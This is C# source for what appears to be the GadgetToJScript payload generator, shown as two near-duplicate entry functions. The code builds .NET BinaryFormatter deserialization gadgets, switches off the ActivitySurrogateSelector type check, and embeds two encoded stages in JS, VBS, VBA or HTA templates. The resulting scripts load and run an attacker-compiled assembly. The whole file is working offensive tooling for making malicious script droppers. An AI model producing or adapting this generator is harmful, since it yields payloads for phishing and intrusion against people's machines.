static void Main(string[] args)
{
var show_help = false;
OptionSet options = new OptionSet()
{
{ "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
{ "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
{ "r|regfree", "registration-free activation of .NET based COM components", v => _regFree = v != null },
{ "h|help=", "Show Help", v => show_help = v != null },
};
try
{
options.Parse(args);
if (_wsh == "" || _outputFName == "")
{
showHelp(options);
return;
}
if (!Enum.IsDefined(typeof(EWSH), _wsh))
{
showHelp(options);
return;
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
Console.WriteLine("Try --help for more information.");
showHelp(options);
return;
}
string resourceName = "";
switch (_wsh)
{
case "js":
if (_regFree)
{
resourceName = "GadgetToJScript.templates.jscript-regfree.template";
}
else
{
resourceName = "GadgetToJScript.templates.jscript.template";
}
break;
case "vbs":
resourceName = "GadgetToJScript.templates.vbscript.template";
break;
case "vba":
Console.WriteLine("Not supported yet, only JS, VBS and HTA are supported at the moment");
return;
//resourceName = "GadgetToJScript.templates.vbascript.template";
//break;
case "hta":
resourceName = "GadgetToJScript.templates.htascript.template";
break;
default:
if (_regFree)
{
resourceName = "GadgetToJScript.templates.jscript-regfree.template";
}
else
{
resourceName = "GadgetToJScript.templates.jscript.template";
}
break;
}
MemoryStream _msStg1 = new MemoryStream();
_DisableTypeCheckGadgetGenerator _disableTypCheckObj = new _DisableTypeCheckGadgetGenerator();
_msStg1 = _disableTypCheckObj.generateGadget(_msStg1);
ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
Assembly testAssembly = TestAssemblyLoader.compile();
BinaryFormatter _formatterStg2 = new BinaryFormatter();
MemoryStream _msStg2 = new MemoryStream();
_ASurrogateGadgetGenerator _gadgetStg = new _ASurrogateGadgetGenerator(testAssembly);
_formatterStg2.Serialize(_msStg2, _gadgetStg);
Assembly assembly = Assembly.GetExecutingAssembly();
string _wshTemplate = "";
using (Stream stream = assembly.GetManifestResourceStream(resourceName))
using (StreamReader reader = new StreamReader(stream))
{
_wshTemplate = reader.ReadToEnd();
_wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
_wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
_wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
_wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
}
using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
{
_generatedWSH.WriteLine(_wshTemplate);
}
}
public static void DoStuff(string[] args)
{
var show_help = false;
OptionSet options = new OptionSet()
{
{ "w|scriptType=", "js, vbs, vba or hta", v => _wsh = v },
{ "e|encodeType=", "VBA gadgets encoding: b64 or hex (default set to b64)", v => _enc = v },
{ "o|output=", "Generated payload output file, example: C:\\Users\\userX\\Desktop\\output (Without extension)", v => _outputFName = v },
{ "r|regfree", "registration-free activation of .NET based COM components", v => _regFree = v != null },
{ "h|help=", "Show Help", v => show_help = v != null },
};
try
{
options.Parse(args);
if (_wsh == "" || _outputFName == "")
{
showHelp(options);
return;
}
if (!Enum.IsDefined(typeof(EWSH), _wsh))
{
showHelp(options);
return;
}
if (!Enum.IsDefined(typeof(ENC), _enc))
{
showHelp(options);
return;
}
}
catch (Exception e)
{
Console.WriteLine(e.Message);
Console.WriteLine("Try --help for more information.");
showHelp(options);
return;
}
string resourceName = "";
switch (_wsh)
{
case "js":
if (_regFree)
{
resourceName = "CovToJScript.GadgetToJScript.templates.jscript-regfree.template";
}
else
{
resourceName = "CovToJScript.GadgetToJScript.templates.jscript.template";
}
break;
case "vbs":
resourceName = "CovToJScript.GadgetToJScript.templates.vbscript.template";
break;
case "vba":
//Console.WriteLine("Not supported yet, only JS, VBS and HTA are supported at the moment");
//return;
if (_enc == "b64")
{
resourceName = "CovToJScript.GadgetToJScript.templates.vbascriptb64.template";
}
else
{
resourceName = "CovToJScript.GadgetToJScript.templates.vbascripthex.template";
}
break;
case "hta":
resourceName = "CovToJScript.GadgetToJScript.templates.htascript.template";
break;
default:
if (_regFree)
{
resourceName = "CovToJScript.GadgetToJScript.templates.jscript-regfree.template";
}
else
{
resourceName = "CovToJScript.GadgetToJScript.templates.jscript.template";
}
break;
}
MemoryStream _msStg1 = new MemoryStream();
_DisableTypeCheckGadgetGenerator _disableTypCheckObj = new _DisableTypeCheckGadgetGenerator();
_msStg1 = _disableTypCheckObj.generateGadget(_msStg1);
System.Configuration.ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
Assembly testAssembly = TestAssemblyLoader.compile();
BinaryFormatter _formatterStg2 = new BinaryFormatter();
MemoryStream _msStg2 = new MemoryStream();
_ASurrogateGadgetGenerator _gadgetStg = new _ASurrogateGadgetGenerator(testAssembly);
_formatterStg2.Serialize(_msStg2, _gadgetStg);
Assembly assembly = Assembly.GetExecutingAssembly();
string _wshTemplate = "";
using (Stream stream = assembly.GetManifestResourceStream(resourceName))
if (_wsh != "vba")
{
using (StreamReader reader = new StreamReader(stream))
{
_wshTemplate = reader.ReadToEnd();
_wshTemplate = _wshTemplate.Replace("%_STAGE1_%", Convert.ToBase64String(_msStg1.ToArray()));
_wshTemplate = _wshTemplate.Replace("%_STAGE1Len_%", _msStg1.Length.ToString());
_wshTemplate = _wshTemplate.Replace("%_STAGE2_%", Convert.ToBase64String(_msStg2.ToArray()));
_wshTemplate = _wshTemplate.Replace("%_STAGE2Len_%", _msStg2.Length.ToString());
}
}
else
{
List <string> stage1Lines = new List <String>();
List <string> stage2Lines = new List <String>();
if (_enc == "b64")
{
stage1Lines = SplitToLines(Convert.ToBase64String(_msStg1.ToArray()), 100).ToList();
stage2Lines = SplitToLines(Convert.ToBase64String(_msStg2.ToArray()), 100).ToList();
}
else
{
stage1Lines = SplitToLines(BitConverter.ToString(_msStg1.ToArray()).Replace("-", ""), 100).ToList();
stage2Lines = SplitToLines(BitConverter.ToString(_msStg2.ToArray()).Replace("-", ""), 100).ToList();
}
StringBuilder _b1 = new StringBuilder();
_b1.Append("stage_1 = \"").Append(stage1Lines[0]).Append("\"");
_b1.AppendLine();
stage1Lines.RemoveAt(0);
foreach (String line in stage1Lines)
{
_b1.Append("stage_1 = stage_1 & \"").Append(line.ToString().Trim()).Append("\"");
_b1.AppendLine();
}
StringBuilder _b2 = new StringBuilder();
_b2.Append("stage_2 = \"").Append(stage2Lines[0]).Append("\"");
_b2.AppendLine();
stage2Lines.RemoveAt(0);
foreach (String line in stage2Lines)
{
_b2.Append("stage_2 = stage_2 & \"").Append(line.ToString().Trim()).Append("\"");
_b2.AppendLine();
}
using (StreamReader reader = new StreamReader(stream))
{
_wshTemplate = reader.ReadToEnd();
_wshTemplate = _wshTemplate.Replace("%_STAGE1_%", _b1.ToString());
_wshTemplate = _wshTemplate.Replace("%_STAGE2_%", _b2.ToString());
}
}
using (StreamWriter _generatedWSH = new StreamWriter(_outputFName + "." + _wsh))
{
_generatedWSH.WriteLine(_wshTemplate);
}
}
